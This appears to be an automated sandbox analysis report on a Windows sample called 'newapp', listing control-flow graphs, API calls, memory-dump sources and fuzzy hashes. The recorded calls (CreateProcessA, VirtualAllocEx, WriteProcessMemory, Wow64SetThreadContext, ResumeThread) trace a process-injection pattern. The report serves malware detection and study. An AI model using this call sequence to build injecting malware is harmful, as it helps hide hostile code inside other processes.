                                                                                                            control_flow_graph 294 d8d468-d8d507 GetCurrentProcess 298 d8d509-d8d50f 294->298 299 d8d510-d8d544 GetCurrentThread 294->299 298->299 300 d8d54d-d8d581 GetCurrentProcess 299->300 301 d8d546-d8d54c 299->301 303 d8d58a-d8d5a5 call d8d647 300->303 304 d8d583-d8d589 300->304 301->300 306 d8d5ab-d8d5da GetCurrentThreadId 303->306 304->303 308 d8d5dc-d8d5e2 306->308 309 d8d5e3-d8d645 306->309 308->309
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00D8D4F6
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00D8D533
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00D8D570
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00D8D5C9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_d80000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: e3cf5c814e5040bdbe5031e5fbb3485b35a6e30cef4b883e8e1e14a37855fe8d
                                                                                                            • Instruction ID: c8793ccba723ed52596566a0c07e48c45772b53d1967073cb220c1b75f1c930e
                                                                                                            • Opcode Fuzzy Hash: e3cf5c814e5040bdbe5031e5fbb3485b35a6e30cef4b883e8e1e14a37855fe8d
                                                                                                            • Instruction Fuzzy Hash: E05156B09002498FDB18DFA9D548BDEBFF2EF49318F248469D419A73A0DB349984CF65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 316 d8d478-d8d507 GetCurrentProcess 320 d8d509-d8d50f 316->320 321 d8d510-d8d544 GetCurrentThread 316->321 320->321 322 d8d54d-d8d581 GetCurrentProcess 321->322 323 d8d546-d8d54c 321->323 325 d8d58a-d8d5a5 call d8d647 322->325 326 d8d583-d8d589 322->326 323->322 328 d8d5ab-d8d5da GetCurrentThreadId 325->328 326->325 330 d8d5dc-d8d5e2 328->330 331 d8d5e3-d8d645 328->331 330->331
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00D8D4F6
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00D8D533
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00D8D570
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00D8D5C9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_d80000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: bf9870d135388954dd3b337299c9adb824f62a6b5c5911320240dbddc81d66d2
                                                                                                            • Instruction ID: df549894d4bd7e3514e9e5a774b3c30928910069ce5e1dc03057edd6302ed410
                                                                                                            • Opcode Fuzzy Hash: bf9870d135388954dd3b337299c9adb824f62a6b5c5911320240dbddc81d66d2
                                                                                                            • Instruction Fuzzy Hash: FA5137B09002098FDB18DFAAD548B9EBFF1FB49318F24C469D419A73A0D774A984CF65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 360 556b930-556b9c5 362 556b9c7-556b9d1 360->362 363 556b9fe-556ba1e 360->363 362->363 364 556b9d3-556b9d5 362->364 370 556ba57-556ba86 363->370 371 556ba20-556ba2a 363->371 365 556b9d7-556b9e1 364->365 366 556b9f8-556b9fb 364->366 368 556b9e5-556b9f4 365->368 369 556b9e3 365->369 366->363 368->368 372 556b9f6 368->372 369->368 377 556babf-556bb79 CreateProcessA 370->377 378 556ba88-556ba92 370->378 371->370 373 556ba2c-556ba2e 371->373 372->366 375 556ba30-556ba3a 373->375 376 556ba51-556ba54 373->376 379 556ba3e-556ba4d 375->379 380 556ba3c 375->380 376->370 391 556bb82-556bc08 377->391 392 556bb7b-556bb81 377->392 378->377 381 556ba94-556ba96 378->381 379->379 382 556ba4f 379->382 380->379 383 556ba98-556baa2 381->383 384 556bab9-556babc 381->384 382->376 386 556baa6-556bab5 383->386 387 556baa4 383->387 384->377 386->386 388 556bab7 386->388 387->386 388->384 402 556bc0a-556bc0e 391->402 403 556bc18-556bc1c 391->403 392->391 402->403 404 556bc10 402->404 405 556bc1e-556bc22 403->405 406 556bc2c-556bc30 403->406 404->403 405->406 407 556bc24 405->407 408 556bc32-556bc36 406->408 409 556bc40-556bc44 406->409 407->406 408->409 412 556bc38 408->412 410 556bc56-556bc5d 409->410 411 556bc46-556bc4c 409->411 413 556bc74 410->413 414 556bc5f-556bc6e 410->414 411->410 412->409 416 556bc75 413->416 414->413 416->416
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0556BB66
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_5560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: f4fd3f631e2bf373d69478a0907c9339b5aad9478a0edd6cf04d16007f94b9fa
                                                                                                            • Instruction ID: 515d99ea7be7dda2d7401f42dd2efd5f1b4a2e7871d49117f29698afb42d4ae1
                                                                                                            • Opcode Fuzzy Hash: f4fd3f631e2bf373d69478a0907c9339b5aad9478a0edd6cf04d16007f94b9fa
                                                                                                            • Instruction Fuzzy Hash: 02915B71D00259DFDB24CF69C841BEDBBB2BF48320F1481A9E859E7250DB749A85CF92

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 417 d8ade8-d8adf7 418 d8adf9-d8ae06 call d89414 417->418 419 d8ae23-d8ae27 417->419 424 d8ae08 418->424 425 d8ae1c 418->425 421 d8ae29-d8ae33 419->421 422 d8ae3b-d8ae7c 419->422 421->422 428 d8ae89-d8ae97 422->428 429 d8ae7e-d8ae86 422->429 472 d8ae0e call d8b080 424->472 473 d8ae0e call d8b070 424->473 425->419 430 d8ae99-d8ae9e 428->430 431 d8aebb-d8aebd 428->431 429->428 433 d8aea9 430->433 434 d8aea0-d8aea7 call d8a150 430->434 436 d8aec0-d8aec7 431->436 432 d8ae14-d8ae16 432->425 435 d8af58-d8b018 432->435 438 d8aeab-d8aeb9 433->438 434->438 467 d8b01a-d8b01d 435->467 468 d8b020-d8b04b GetModuleHandleW 435->468 439 d8aec9-d8aed1 436->439 440 d8aed4-d8aedb 436->440 438->436 439->440 442 d8aee8-d8aef1 call d8a160 440->442 443 d8aedd-d8aee5 440->443 448 d8aefe-d8af03 442->448 449 d8aef3-d8aefb 442->449 443->442 451 d8af21-d8af2e 448->451 452 d8af05-d8af0c 448->452 449->448 458 d8af30-d8af4e 451->458 459 d8af51-d8af57 451->459 452->451 453 d8af0e-d8af1e call d8a170 call d8a180 452->453 453->451 458->459 467->468 469 d8b04d-d8b053 468->469 470 d8b054-d8b068 468->470 469->470 472->432 473->432
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00D8B03E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_d80000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: a5a4f590fb7d85f7b8ee04ac3ebb5e9bbd31aa091ed685162270e022aff5de7a
                                                                                                            • Instruction ID: 35f31ae42f640d0f6327973401885336b4b19feeb5f4b665249be993ffaa8cd7
                                                                                                            • Opcode Fuzzy Hash: a5a4f590fb7d85f7b8ee04ac3ebb5e9bbd31aa091ed685162270e022aff5de7a
                                                                                                            • Instruction Fuzzy Hash: 3D714470A00B058FE724EF29D04575ABBF1FF88300F04892EE09ADBA50D735E845CBA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 474 d844b4-d859d9 CreateActCtxA 477 d859db-d859e1 474->477 478 d859e2-d85a3c 474->478 477->478 485 d85a4b-d85a4f 478->485 486 d85a3e-d85a41 478->486 487 d85a60 485->487 488 d85a51-d85a5d 485->488 486->485 490 d85a61 487->490 488->487 490->490
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00D859C9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_d80000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: d5b9d18e723649e6a9a91ec7baddc396297b955201c75fcf17ac44ac80ede85d
                                                                                                            • Instruction ID: 1972f981c08e3cf0b0355194f33e324adba934a8635151d7ec565ecc3f77631a
                                                                                                            • Opcode Fuzzy Hash: d5b9d18e723649e6a9a91ec7baddc396297b955201c75fcf17ac44ac80ede85d
                                                                                                            • Instruction Fuzzy Hash: 3F41D1B0C0061DCBDB24DFA9C884BDEBBB5BF48304F24816AD408AB255DB756985CFA0

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 491 d8590c-d859d9 CreateActCtxA 493 d859db-d859e1 491->493 494 d859e2-d85a3c 491->494 493->494 501 d85a4b-d85a4f 494->501 502 d85a3e-d85a41 494->502 503 d85a60 501->503 504 d85a51-d85a5d 501->504 502->501 506 d85a61 503->506 504->503 506->506
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00D859C9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_d80000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: 3efc27f579262b9461380b0911ab0e444412c35bd1b3cbcd18b7fd1c7b3dc976
                                                                                                            • Instruction ID: ed30f560ab410a94b9f610052d98b8a3830c716d43d37bb72978fda792f247db
                                                                                                            • Opcode Fuzzy Hash: 3efc27f579262b9461380b0911ab0e444412c35bd1b3cbcd18b7fd1c7b3dc976
                                                                                                            • Instruction Fuzzy Hash: 8941E3B0C00719CFDB28DFA9C884BCDBBB5BF49304F24815AD458AB255DB756985CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 507 556b6a8-556b6f6 509 556b706-556b745 WriteProcessMemory 507->509 510 556b6f8-556b704 507->510 512 556b747-556b74d 509->512 513 556b74e-556b77e 509->513 510->509 512->513
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0556B738
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_5560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 032d5926c3164b43a2552a816e7a2b5b88da2a24174da2ac0d1fad23ff37bbe4
                                                                                                            • Instruction ID: 9b3bd3d474d2ddb33367eb53418a78f51e205400db45de43c501768cf4779e73
                                                                                                            • Opcode Fuzzy Hash: 032d5926c3164b43a2552a816e7a2b5b88da2a24174da2ac0d1fad23ff37bbe4
                                                                                                            • Instruction Fuzzy Hash: EC2136B59003599FCF10CFA9C885BDEBBF5FF48324F10842AE959A7250C7789944CBA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 517 556b790-556b825 ReadProcessMemory 521 556b827-556b82d 517->521 522 556b82e-556b85e 517->522 521->522
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0556B818
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_5560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: 875ae8ee72fc3f413b17f81b813e70b8984e0b7548c62789bb455167eea78d35
                                                                                                            • Instruction ID: 727ce27d5224a423a6b921cbca8fb58cde4f3589b1f1ce4cbbdfe4fde0694668
                                                                                                            • Opcode Fuzzy Hash: 875ae8ee72fc3f413b17f81b813e70b8984e0b7548c62789bb455167eea78d35
                                                                                                            • Instruction Fuzzy Hash: 3D212AB1D003599FCB10DFA9C881AEEFBF5FF48320F108429E959A7250D7349944CBA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 526 d8d6b9-d8d754 DuplicateHandle 527 d8d75d-d8d77a 526->527 528 d8d756-d8d75c 526->528 528->527
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D8D747
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_d80000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: d008afa9077d8155fdee6aab71c07535477aa58897fddd569b44a3e5def16b1c
                                                                                                            • Instruction ID: b645430ba88a00ca29832fef6ac2c286cfd504c17a78bc8c40b71dd3a6ab3290
                                                                                                            • Opcode Fuzzy Hash: d008afa9077d8155fdee6aab71c07535477aa58897fddd569b44a3e5def16b1c
                                                                                                            • Instruction Fuzzy Hash: CF2103B59002589FDB10CFAAD984AEEBFF5EB48310F14842AE954A3350C374A940CF61

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 541 556b798-556b825 ReadProcessMemory 544 556b827-556b82d 541->544 545 556b82e-556b85e 541->545 544->545
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0556B818
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_5560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: 0e60fcec29fb17dba49b7e18c339794ca2649c88b18d4397ef72e0c43b6272bb
                                                                                                            • Instruction ID: 9bd27933f0a662b674534c0e2ecdfb87db966fbde1cf7fda355f8e20139ffafc
                                                                                                            • Opcode Fuzzy Hash: 0e60fcec29fb17dba49b7e18c339794ca2649c88b18d4397ef72e0c43b6272bb
                                                                                                            • Instruction Fuzzy Hash: CB2137B1C003599FCB10DFAAC881AEEFBF5FF48320F10842AE559A7250C7389944CBA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 531 556b0d8-556b123 533 556b125-556b131 531->533 534 556b133-556b163 Wow64SetThreadContext 531->534 533->534 536 556b165-556b16b 534->536 537 556b16c-556b19c 534->537 536->537
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0556B156
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_5560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: c96d5a3ba9bb83300327b52f8a4c6cb5c79f79f84155d5f86900a9958467fa75
                                                                                                            • Instruction ID: 495e65df63cd88b32be41676be3a416daa02d5379d89d5c3703d1959cc95c805
                                                                                                            • Opcode Fuzzy Hash: c96d5a3ba9bb83300327b52f8a4c6cb5c79f79f84155d5f86900a9958467fa75
                                                                                                            • Instruction Fuzzy Hash: 042138B1D002499FDB10DFAAC4857EEBBF4FF48324F108429D459A7240DB789985CFA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 549 d8d6c0-d8d754 DuplicateHandle 550 d8d75d-d8d77a 549->550 551 d8d756-d8d75c 549->551 551->550
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D8D747
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_d80000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 48ea76aaeb0f474dd52ddb35b6e60ed32e17da23121761a130d4966772f6c4dc
                                                                                                            • Instruction ID: a3addd285f3b6653e765b03baf0612acfb30697f7e38c38f413306a5315db5d8
                                                                                                            • Opcode Fuzzy Hash: 48ea76aaeb0f474dd52ddb35b6e60ed32e17da23121761a130d4966772f6c4dc
                                                                                                            • Instruction Fuzzy Hash: 8221E2B59002189FDB10CFAAD984ADEBBF9EB48320F14841AE918A3350C374A940CFA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 554 556b5e0-556b663 VirtualAllocEx 558 556b665-556b66b 554->558 559 556b66c-556b691 554->559 558->559
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0556B656
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_5560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 5fc419b5f32edbd924ae0a9fae3132351d20740365314c0b457f75c18600ab6a
                                                                                                            • Instruction ID: 9d491b0933378d60f9874874321cedc56d9507c5b7a6c547397a0ae2c0ff910c
                                                                                                            • Opcode Fuzzy Hash: 5fc419b5f32edbd924ae0a9fae3132351d20740365314c0b457f75c18600ab6a
                                                                                                            • Instruction Fuzzy Hash: 811159B28002499FCB10DFA9D845ADFBFF5FF88320F108419E559A7250CB759594CFA5
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0556B656
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_5560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 6ec8795c9fc5fd69d83485afca1d8d7895ec5bb585fa207b623490ec7f498e57
                                                                                                            • Instruction ID: c5d293764c84682a9a5b17d753001c068bc9409c4e39327b27ce4160181b4ab2
                                                                                                            • Opcode Fuzzy Hash: 6ec8795c9fc5fd69d83485afca1d8d7895ec5bb585fa207b623490ec7f498e57
                                                                                                            • Instruction Fuzzy Hash: 961137B29002499FCB10DFAAC844BDEBFF5FF88320F108419E559A7250C775A554CFA5
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_5560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: f81ba7e2eae8ac379ec5456340481e71dc5f8c99e20083e017d2ea49682af30a
                                                                                                            • Instruction ID: 97731b86afbfe568529eb7de4c669ddb5d7813ef85adb14f5fccadb0f0dbc6a4
                                                                                                            • Opcode Fuzzy Hash: f81ba7e2eae8ac379ec5456340481e71dc5f8c99e20083e017d2ea49682af30a
                                                                                                            • Instruction Fuzzy Hash: 1C1136B1D002488FCB20DFAAC4457DEFFF5EB88324F208829D559A7250CB75A944CFA5
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0556E28D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_5560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: f3eb3a1fad3b055fd1e7c9e266da4c42bf998d89d1ddafe16e65bfed3bf45c04
                                                                                                            • Instruction ID: 04ae0c88a6411132422b81444f550ce6830586c3760dbb7a8341ad983555b34d
                                                                                                            • Opcode Fuzzy Hash: f3eb3a1fad3b055fd1e7c9e266da4c42bf998d89d1ddafe16e65bfed3bf45c04
                                                                                                            • Instruction Fuzzy Hash: 8311E0B58003499FDB10DF9AD845BDEBBF8FB48320F20841AE958A7250C375A544CFA5
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0556E28D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1956395251.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_5560000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 09f752afa42105d9d2431319429b75839de3c749e622f062e91660f8e969096c
                                                                                                            • Instruction ID: 2f22fc7bed51473ae3d02e0fce4ed7dd519cd4d421ffb82bbd234c788b6ac284
                                                                                                            • Opcode Fuzzy Hash: 09f752afa42105d9d2431319429b75839de3c749e622f062e91660f8e969096c
                                                                                                            • Instruction Fuzzy Hash: 5E11F2B58003489FDB10DF9AC489BDFBBF9FB48320F108419E558A7200C375A944CFA5
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00D8B03E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1944787396.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_d80000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: 3563c4d7ddeeebe8510284068fadd054b7005efb394182e2ece42cf2c580906d
                                                                                                            • Instruction ID: 9cf5858801efc606648eee7af0be04a1b8a610b5f5f8fe2c15256b8c88851fe4
                                                                                                            • Opcode Fuzzy Hash: 3563c4d7ddeeebe8510284068fadd054b7005efb394182e2ece42cf2c580906d
                                                                                                            • Instruction Fuzzy Hash: 8A110FB5C002498FCB10DF9AC444ADEFBF8EB89324F14842AD528A7210D379A545CFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1942747197.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_d2d000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fca56d4f203204c47135d4785264a044350d77a2cfbe36099792c3c346acf0f9
                                                                                                            • Instruction ID: 72e1dd506f7ae4dd012a7ab5f22f19c7cb82b89d45ef225c140d4d276244e851
                                                                                                            • Opcode Fuzzy Hash: fca56d4f203204c47135d4785264a044350d77a2cfbe36099792c3c346acf0f9
                                                                                                            • Instruction Fuzzy Hash: EB210071604300DFDB06DF14E9C0B27BF66FBA8318F24C169E9494B656C336D866CAB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1943269739.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_d3d000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1594445a0571be7f191c20c02d1c5546594fb51f77e19eeeeba15619b3f28e51
                                                                                                            • Instruction ID: 56ea4bbf63f945e891679dd2b28ff932ebca0e319b18afaec2f9f7dcff46561f
                                                                                                            • Opcode Fuzzy Hash: 1594445a0571be7f191c20c02d1c5546594fb51f77e19eeeeba15619b3f28e51
                                                                                                            • Instruction Fuzzy Hash: 48210479504200EFDB05DF14E9C0B27BBA6FB84314F24C66DE8494B296C736D84ACE75
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1943269739.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_d3d000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c8e997f4aad66f224e8f9822ff0168e20ff80a2cb4032318d2dfd35e5609ac03
                                                                                                            • Instruction ID: 3495780448f1b9d103e07fa9cf003570ec7ed1b3172206a02459f91b13f6ca12
                                                                                                            • Opcode Fuzzy Hash: c8e997f4aad66f224e8f9822ff0168e20ff80a2cb4032318d2dfd35e5609ac03
                                                                                                            • Instruction Fuzzy Hash: 6221F271604200DFCB18DF24E9C4B26BBA6FB84B14F24C569E84A4B296C33AD847CE71
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1943269739.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_d3d000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 95ac6d0dc8eb2c75a54d6852d1e7326e35dfe14183acd1198f256566a000812c
                                                                                                            • Instruction ID: 562eccace7cee81d836d535df05c066562d9381761c3c86edafd71c71cbbd056
                                                                                                            • Opcode Fuzzy Hash: 95ac6d0dc8eb2c75a54d6852d1e7326e35dfe14183acd1198f256566a000812c
                                                                                                            • Instruction Fuzzy Hash: C02180755093808FCB06CF24D994715BF72EB46314F28C5EAD8498F2A7C33A980ACB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1942747197.0000000000D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_d2d000_newapp.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
